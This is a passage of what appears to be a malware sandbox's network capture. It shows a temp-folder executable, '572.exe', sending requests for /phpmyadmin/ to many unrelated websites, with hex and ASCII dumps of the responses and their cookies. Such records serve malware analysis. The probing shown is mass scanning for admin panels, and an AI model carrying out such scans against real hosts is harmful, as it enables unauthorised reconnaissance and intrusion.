                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC1419INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 7a 6d 5f 68 74 6d 61 69 64 3d 3b 20 4d 61 78 2d 41 67 65 3d 30 3b 20 45 78 70 69 72 65 73 3d 54 68 75 2c 20 30 31 20 4a 61 6e 20 31 39 37 30 20 30 30 3a 30 30 3a 31 30 20 47 4d 54 3b 20 44 6f 6d 61 69 6e 3d 7a 6f 6f 6d 2e 75 73 3b 20 50 61 74 68 3d 2f 3b 20 53 65 63 75 72 65 3b 20 48 74 74 70 4f 6e 6c 79 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 7a 6d 5f 73 73 69 64 3d 61 77 31 5f 63 5f 4f 74 76 44 75 6a 32 75 51 54 2d 38 45 44 51 6f 4b 49 53 66 74 77 3b 20 44 6f 6d 61 69 6e 3d 7a 6f 6f 6d 2e 75 73 3b 20 50 61 74 68 3d 2f 3b 20 53 65 63 75 72 65 3b 20 48 74 74 70 4f 6e 6c 79 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 63 72 65 64 3d 36 45 32 31 32 38 43 37 35 33 34 42 34 37 46 42 31 41 41 42 33 39 37 31 44 44 30 36 31
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: zm_htmaid=; Max-Age=0; Expires=Thu, 01 Jan 1970 00:00:10 GMT; Domain=zoom.us; Path=/; Secure; HttpOnlySet-Cookie: _zm_ssid=aw1_c_OtvDuj2uQT-8EDQoKISftw; Domain=zoom.us; Path=/; Secure; HttpOnlySet-Cookie: cred=6E2128C7534B47FB1AAB3971DD061
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC818INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 7a 6d 5f 76 69 73 69 74 6f 72 5f 67 75 69 64 3d 62 37 61 32 62 34 32 64 37 35 39 37 34 34 39 65 38 63 38 63 36 65 37 32 30 66 66 35 62 34 37 31 3b 20 4d 61 78 2d 41 67 65 3d 33 31 35 33 36 30 30 30 3b 20 45 78 70 69 72 65 73 3d 54 75 65 2c 20 30 34 20 46 65 62 20 32 30 32 35 20 31 31 3a 31 34 3a 35 33 20 47 4d 54 3b 20 44 6f 6d 61 69 6e 3d 7a 6f 6f 6d 2e 75 73 3b 20 50 61 74 68 3d 2f 3b 20 53 65 63 75 72 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 5f 5f 63 66 5f 62 6d 3d 48 4d 62 56 4e 44 72 52 6a 49 6c 74 61 46 33 6a 68 5a 39 56 2e 30 47 65 62 51 5f 30 6f 52 34 38 51 72 4b 59 76 37 4d 34 58 4d 77 2d 31 37 30 37 31 33 31 36 39 33 2d 31 2d 41 61 62 2b 32 35 63 62 38 38 32 35 59 77 67 71 38 67 70 35 45 6a 4c 42 62 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: Set-Cookie: _zm_visitor_guid=b7a2b42d7597449e8c8c6e720ff5b471; Max-Age=31536000; Expires=Tue, 04 Feb 2025 11:14:53 GMT; Domain=zoom.us; Path=/; SecureSet-Cookie: __cf_bm=HMbVNDrRjIltaF3jhZ9V.0GebQ_0oR48QrKYv7M4XMw-1707131693-1-Aab+25cb8825Ywgq8gp5EjLBbt
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC1369INData Raw: 37 66 66 39 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3a 66 62 3d 22 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 66 62 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 23 20 7a 6f 6f 6d 76 69 64 65 6f 63 61 6c 6c 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 2f 66 62 2f 7a 6f 6f 6d 76 69 64 65 6f 63 61 6c 6c 23 22 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 20 2d 20 5a 6f 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7ff9<!doctype html><html xmlns:fb="http://ogp.me/ns/fb#" lang="en-US"><head prefix="og: http://ogp.me/ns# fb: http://ogp.me/ns/fb# zoomvideocall: http://ogp.me/ns/fb/zoomvideocall#"><title>Page Not Found - Zoom</title><meta http-equiv="X-UA-Compati
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC1369INData Raw: 2c 20 76 69 64 65 6f 20 63 6f 6e 66 65 72 65 6e 63 65 2c 20 6f 6e 6c 69 6e 65 20 6d 65 65 74 69 6e 67 73 2c 20 77 65 62 20 6d 65 65 74 69 6e 67 2c 20 76 69 64 65 6f 20 6d 65 65 74 69 6e 67 2c 20 63 6c 6f 75 64 20 6d 65 65 74 69 6e 67 2c 20 63 6c 6f 75 64 20 76 69 64 65 6f 2c 20 67 72 6f 75 70 20 76 69 64 65 6f 20 63 61 6c 6c 2c 20 67 72 6f 75 70 20 76 69 64 65 6f 20 63 68 61 74 2c 20 73 63 72 65 65 6e 20 73 68 61 72 65 2c 20 61 70 70 6c 69 63 61 74 69 6f 6e 20 73 68 61 72 65 2c 20 6d 6f 62 69 6c 69 74 79 2c 20 6d 6f 62 69 6c 65 20 63 6f 6c 6c 61 62 6f 72 61 74 69 6f 6e 2c 20 64 65 73 6b 74 6f 70 20 73 68 61 72 65 2c 20 76 69 64 65 6f 20 63 6f 6c 6c 61 62 6f 72 61 74 69 6f 6e 2c 20 67 72 6f 75 70 20 6d 65 73 73 61 67 69 6e 67 22 20 2f 3e 0a 3c 6d 65 74 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: , video conference, online meetings, web meeting, video meeting, cloud meeting, cloud video, group video call, group video chat, screen share, application share, mobility, mobile collaboration, desktop share, video collaboration, group messaging" /><meta
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC1369INData Raw: 74 69 6f 6e 20 75 73 65 64 20 61 72 6f 75 6e 64 20 74 68 65 20 77 6f 72 6c 64 20 69 6e 20 62 6f 61 72 64 2c 20 63 6f 6e 66 65 72 65 6e 63 65 2c 20 68 75 64 64 6c 65 2c 20 61 6e 64 20 74 72 61 69 6e 69 6e 67 20 72 6f 6f 6d 73 2c 20 61 73 20 77 65 6c 6c 20 61 73 20 65 78 65 63 75 74 69 76 65 20 6f 66 66 69 63 65 73 20 61 6e 64 20 63 6c 61 73 73 72 6f 6f 6d 73 2e 20 46 6f 75 6e 64 65 64 20 69 6e 20 32 30 31 31 2c 20 5a 6f 6f 6d 20 68 65 6c 70 73 20 62 75 73 69 6e 65 73 73 65 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 20 62 72 69 6e 67 20 74 68 65 69 72 20 74 65 61 6d 73 20 74 6f 67 65 74 68 65 72 20 69 6e 20 61 20 66 72 69 63 74 69 6f 6e 6c 65 73 73 20 65 6e 76 69 72 6f 6e 6d 65 6e 74 20 74 6f 20 67 65 74 20 6d 6f 72 65 20 64 6f 6e 65 2e 20 5a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: tion used around the world in board, conference, huddle, and training rooms, as well as executive offices and classrooms. Founded in 2011, Zoom helps businesses and organizations bring their teams together in a frictionless environment to get more done. Z
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC1369INData Raw: 73 74 5f 63 6f 6f 6b 69 65 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 70 6c 61 69 6e 22 20 63 6c 61 73 73 3d 22 6f 70 74 61 6e 6f 6e 2d 63 61 74 65 67 6f 72 79 2d 43 30 30 30 34 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 69 48 65 46 38 43 6c 43 53 6b 47 79 64 6e 38 5f 59 6d 6e 58 6d 41 22 3e 0a 77 69 6e 64 6f 77 2e 7a 6d 47 6c 6f 62 61 6c 4d 72 6b 74 49 64 20 3d 20 22 62 37 61 32 62 34 32 64 37 35 39 37 34 34 39 65 38 63 38 63 36 65 37 32 30 66 66 35 62 34 37 31 22 20 7c 7c 20 6e 75 6c 6c 3b 0a 77 69 6e 64 6f 77 2e 7a 6d 47 6c 6f 62 61 6c 4d 72 6b 74 4b 65 79 20 3d 20 22 22 20 7c 7c 20 6e 75 6c 6c 3b 0a 77 69 6e 64 6f 77 5b 27 6f 70 74 69 6d 69 7a 65 6c 79 27 5d 20 3d 20 77 69 6e 64 6f 77 5b 27 6f 70
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: st_cookie.min.js" type="text/plain" class="optanon-category-C0004"></script><script nonce="iHeF8ClCSkGydn8_YmnXmA">window.zmGlobalMrktId = "b7a2b42d7597449e8c8c6e720ff5b471" || null;window.zmGlobalMrktKey = "" || null;window['optimizely'] = window['op
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC1369INData Raw: 69 63 6f 6e 2d 65 72 72 6f 72 20 7b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 37 70 78 3b 0a 63 6f 6c 6f 72 3a 20 23 45 38 31 37 33 44 3b 0a 7d 0a 2e 65 78 70 69 72 65 64 2d 63 63 2d 62 61 6e 6e 65 72 20 2e 7a 6d 2d 69 63 6f 6e 2d 63 6c 6f 73 65 20 7b 0a 63 6f 6c 6f 72 3a 20 23 31 33 31 36 31 39 3b 0a 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 69 48 65 46 38 43 6c 43 53 6b 47 79 64 6e 38 5f 59 6d 6e 58 6d 41 22 20 73 72 63 3d 22 2f 63 73 72 66 5f 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 22 69 48 65 46 38 43 6c 43 53 6b 47 79 64 6e 38 5f 59 6d 6e 58 6d 41 22 3e 0a 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: icon-error {font-size: 17px;color: #E8173D;}.expired-cc-banner .zm-icon-close {color: #131619;cursor: pointer;}</style><script nonce="iHeF8ClCSkGydn8_YmnXmA" src="/csrf_js"></script><script nonce="iHeF8ClCSkGydn8_YmnXmA">window.dataLayer = wind
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC1369INData Raw: 72 65 66 27 29 3b 0a 69 66 28 63 6f 6f 6b 69 65 50 72 65 66 44 4f 4d 29 20 7b 0a 63 6f 6f 6b 69 65 50 72 65 66 44 4f 4d 2e 74 65 78 74 20 3d 20 24 2e 69 31 38 6e 2e 67 65 74 28 22 6d 61 72 6b 65 74 69 6e 67 2e 70 72 69 76 61 63 79 2e 6f 6e 65 74 72 75 73 74 2e 63 6f 6f 6b 69 65 5f 70 72 65 66 22 29 3b 0a 7d 0a 76 61 72 20 6f 6e 65 54 72 75 73 74 43 6f 6e 73 65 6e 74 49 64 20 3d 20 4f 6e 65 54 72 75 73 74 2e 67 65 74 44 61 74 61 53 75 62 6a 65 63 74 49 64 28 29 3b 0a 76 61 72 20 61 63 74 69 76 65 47 72 6f 75 70 73 20 3d 20 28 4f 6e 65 74 72 75 73 74 41 63 74 69 76 65 47 72 6f 75 70 73 20 7c 7c 20 27 27 29 2e 73 70 6c 69 74 28 27 2c 27 29 3b 0a 61 63 74 69 76 65 47 72 6f 75 70 73 20 3d 20 61 63 74 69 76 65 47 72 6f 75 70 73 2e 66 69 6c 74 65 72 28 66 75 6e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ref');if(cookiePrefDOM) {cookiePrefDOM.text = $.i18n.get("marketing.privacy.onetrust.cookie_pref");}var oneTrustConsentId = OneTrust.getDataSubjectId();var activeGroups = (OnetrustActiveGroups || '').split(',');activeGroups = activeGroups.filter(fun
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC1369INData Raw: 6f 72 64 65 72 2d 6c 65 66 74 3a 20 31 70 78 20 73 6f 6c 69 64 3b 0a 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 30 70 78 3b 0a 7d 0a 23 6f 74 2d 64 6f 2d 6e 6f 74 2d 73 65 6c 6c 20 7b 0a 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 34 32 70 78 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 23 6f 74 2d 64 6f 2d 6e 6f 74 2d 73 65 6c 6c 3a 3a 62 65 66 6f 72 65 20 7b 0a 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0a 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 6c 65 66 74 3a 20 36 70 78 3b 0a 74 6f 70 3a 20 35 30 25 3b 0a 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 59 28 2d 35 30 25 29 3b 0a 77 69 64 74 68 3a 20 33 30 70 78 3b 0a 68 65 69 67 68 74 3a 20 31 35 70 78 3b 0a 62 61 63 6b
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: order-left: 1px solid;margin-left: 10px;}#ot-do-not-sell {position: relative;padding-left: 42px !important;}#ot-do-not-sell::before {content: "";position: absolute;left: 6px;top: 50%;transform: translateY(-50%);width: 30px;height: 15px;back
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC1369INData Raw: 74 72 6f 6c 73 3d 22 73 65 61 72 63 68 42 6f 78 22 20 74 61 62 69 6e 64 65 78 3d 22 30 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 42 75 74 74 6f 6e 49 63 6f 6e 22 3e 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 66 6f 63 75 73 61 62 6c 65 3d 22 66 61 6c 73 65 22 20 65 6e 61 62 6c 65 2d 62 61 63 6b 67 72 6f 75 6e 64 3d 22 6e 65 77 20 30 20 30 20 32 30 20 32 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 30 20 32 30 22 20 72 6f 6c 65 3d 22 69 6d 67 22 3e 0a 3c 67 20 66 69 6c 6c 3d 22 63 75 72 72 65 6e 74 43 6f 6c 6f 72 22 3e 0a 3c 70 61 74 68 20 64 3d 22 6d 38 2e 33 36 38 20 31 36 2e 37 33 36 63 2d 34 2e 36 31 34 20 30 2d 38 2e 33 36 38 2d 33 2e 37 35 34
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: trols="searchBox" tabindex="0"><span class="searchButtonIcon"><svg xmlns="http://www.w3.org/2000/svg" focusable="false" enable-background="new 0 0 20 20" viewBox="0 0 20 20" role="img"><g fill="currentColor"><path d="m8.368 16.736c-4.614 0-8.368-3.754


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                91192.168.2.654867164.100.128.15443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC178OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: upsconline.nic.in
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC252INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 954
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC954INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 74 68 69 73 20 70 61 67 65 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 30 70 78 3b 0a 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 30 70 78 3b 0a 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 30 70 78 3b 0a 09 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 0a 7d 0a 2e 73 74 79 6c 65 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 7d 0a 2e 73 74 79 6c 65 32 20 7b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 09 66 6f 6e 74 2d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><meta charset="utf-8"/><title>404 - this page does not exist</title><style type="text/css">body {margin-left: 0px;margin-top: 0px;margin-right: 0px;margin-bottom: 0px;}.style1 {font-size: 18px}.style2 {font-size: 18px;font-


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                92192.168.2.65587431.13.88.35443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC193OUTGET /phpmyadmin/?locale=es_LA&_rdr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: m.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:54 UTC786INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: datr=LcPAZePgUg-x6r8Z_KTACJCj; expires=Tue, 11-Mar-2025 11:14:53 GMT; Max-Age=34560000; path=/; domain=.facebook.com; secure; httponly
                                                                                                                                                                                                                                                                                                                                                                Location: https://m.facebook.com/login.php?next=https%3A%2F%2Fm.facebook.com%2Fphpmyadmin%2F%3Flocale%3Des_LA&refsrc=deprecated&locale2=es_LA&_rdr
                                                                                                                                                                                                                                                                                                                                                                reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0"
                                                                                                                                                                                                                                                                                                                                                                report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:54 UTC2156INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 64 61 74 61 3a 20 62 6c 6f 62 3a 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 66 62 73 62 78 2e 63 6f 6d 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 27 75 6e 73 61 66 65 2d 65 76 61 6c 27 3b 73 63 72 69 70 74 2d 73 72 63 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 20 2a 2e 66 62 63 64 6e 2e 6e 65 74 20 2a 2e 66 61 63 65 62 6f 6f 6b 2e 6e 65 74 20 2a 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 73 2e 63 6f 6d 20 2a 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 20 31 32 37 2e 30 2e 30 2e 31 3a 2a 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 20 62 6c 6f 62 3a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net *.facebook.net *.google-analytics.com *.google.com 127.0.0.1:* 'unsafe-inline' blob:
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:54 UTC812INData Raw: 63 72 6f 73 73 2d 6f 72 69 67 69 6e 2d 65 6d 62 65 64 64 65 72 2d 70 6f 6c 69 63 79 2d 72 65 70 6f 72 74 2d 6f 6e 6c 79 3a 20 72 65 71 75 69 72 65 2d 63 6f 72 70 3b 72 65 70 6f 72 74 2d 74 6f 3d 22 63 6f 65 70 5f 72 65 70 6f 72 74 22 0d 0a 63 72 6f 73 73 2d 6f 72 69 67 69 6e 2d 6f 70 65 6e 65 72 2d 70 6f 6c 69 63 79 3a 20 73 61 6d 65 2d 6f 72 69 67 69 6e 2d 61 6c 6c 6f 77 2d 70 6f 70 75 70 73 3b 72 65 70 6f 72 74 2d 74 6f 3d 22 63 6f 6f 70 5f 72 65 70 6f 72 74 22 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 45 78 70 69 72 65 73 3a 20 53 61 74 2c 20 30 31 20 4a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: cross-origin-embedder-policy-report-only: require-corp;report-to="coep_report"cross-origin-opener-policy: same-origin-allow-popups;report-to="coop_report"Pragma: no-cacheCache-Control: private, no-cache, no-store, must-revalidateExpires: Sat, 01 J


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                93192.168.2.65524854.85.194.183443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC182OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pxndx-mcr.boletia.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC197INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 7358
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.12.2
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                ETag: "5df8f9a3-1cbe"
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC7358INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d e2 80 9c 73 74 79 6c 65 73 68 65 65 74 e2 80 9d 20 68 72 65 66 3d e2 80 9c 68 74 74 70 73 3a 2f 2f 75 73 65 2e 74 79 70 65 6b 69 74 2e 6e 65 74 2f 6e 6b 77 33 70 6c 72 2e 63 73 73 e2 80 9c 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 2c 20 2a 3a 62 65 66 6f 72 65 2c 20 2a 3a 61 66 74 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>Document</title> <link rel=stylesheet href=https://use.typekit.net/nkw3plr.css> <style> *, *:before, *:after { box-sizing: border-box; position: rel


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                94192.168.2.655518138.66.39.205443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC184OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: login2.innova.puglia.it
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC249INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:53 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.6.0 (N;ecid=1409681332155852,0:1)
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 194
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:14:53 UTC194INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /phpmyadmin/ was not found.</p></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                95192.168.2.6557598.45.52.148443524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
